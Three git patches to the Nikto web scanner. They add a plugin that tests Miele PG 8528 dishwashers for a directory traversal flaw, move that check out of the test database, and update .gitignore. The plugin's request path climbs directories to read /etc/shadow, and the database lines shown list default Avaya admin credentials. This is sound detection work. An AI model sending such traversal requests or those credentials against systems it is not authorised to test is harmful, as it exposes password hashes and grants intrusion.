From ef61810c2463e3c05b7f63bef5afa9d0e9af24a5 Mon Sep 17 00:00:00 2001 From: Jeremy Bae Date: Thu, 30 Mar 2017 14:40:12 +0900 Subject: [PATCH 1/3] Add dish washer directory traversal check plugin --- program/plugins/nikto_dishwasher.plugin | 45 +++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 program/plugins/nikto_dishwasher.plugin diff --git a/program/plugins/nikto_dishwasher.plugin b/program/plugins/nikto_dishwasher.plugin new file mode 100644 index 00000000..e9ae5b05 --- /dev/null +++ b/program/plugins/nikto_dishwasher.plugin @@ -0,0 +1,45 @@ +#VERSION,2.20 +############################################################################### +# Copyright (C) 2017 Chris Sullo +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License +# as published by the Free Software Foundation; version 2 +# of the License only. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to +# Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +############################################################################### +# PURPOSE: +# Check for the Miele Professional PG 8528 directory traversal vulnerability +############################################################################### +sub nikto_dishwasher_init { + my $id = { name => "dishwasher", + full_name => "dishwasher", + author => "Jeremy Bae", + description => "Look for the dishwasher directory traversal vulnerability.", + hooks => { scan => { method => \&nikto_dishwasher, weight => 20 }, }, + copyright => "2017 Chris Sullo", + }; + + return $id; +} + +sub nikto_dishwasher { + my ($mark, $parameters) = @_; + my $path = "/../../../../../../../../../../../../etc/shadow"; + + my ($res, $content, $error, $request, $response) = nfetch($mark, $path, "GET", "", "", "", "dishwasher"); + + if (($response->{'server'} =~ 'PST10 WebServer') && ($content =~ 'root:\$1\$.*')) { + add_vulnerability($mark, "$path: Site appears vulnerable to the dishwasher directory traversal vulnerability.", 999951, 0, "GET", $path, $request, $response); + } +} + +1; From 32ef144d22503e708dc2b7eb58ba6195d7ce7a5f Mon Sep 17 00:00:00 2001 From: Jeremy Bae Date: Thu, 30 Mar 2017 14:44:31 +0900 Subject: [PATCH 2/3] Remove dishwasher check pattern from db_tests --- program/databases/db_tests | 1 - 1 file changed, 1 deletion(-) diff --git a/program/databases/db_tests b/program/databases/db_tests index 284376fd..549c9644 100644 --- a/program/databases/db_tests +++ b/program/databases/db_tests @@ -6848,4 +6848,3 @@ "007157","0","e","/WebLM/","GET","Web License Manager (WebLM)","","Avaya","","","Avaya license managing console found. Default credential is admin:weblmadmin","","" "007158","0","e","/g450.html","GET","Avaya G450/G350 - Avaya Device Management","","routerIp","","","Avaya web console found. Default SNMP community string is public","","" "007159","0","e","/local-login/","GET","Unified Communications Management","","Avaya","","","Avaya System Manager web console found. Default credential is admin:admin","","" -"007160","0","7","/../../../../../../../../../../../../etc/shadow","GET","root:\$1\$.*","","","","","Miele Professional PG 8528 directory traversal. See http://seclists.org/fulldisclosure/2017/Mar/63","","" From 7ceca570b3eb50125e063903b2d529983b9282fc Mon Sep 17 00:00:00 2001 From: Jeremy Bae Date: Wed, 5 Apr 2017 12:00:05 +0900 Subject: [PATCH 3/3] Add ctags file --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index aa391fe6..5645f889 100644 --- a/.gitignore +++ b/.gitignore @@ -3,3 +3,4 @@ /*.bbprojectd/ *.sublime-project *.sublime-workspace +tags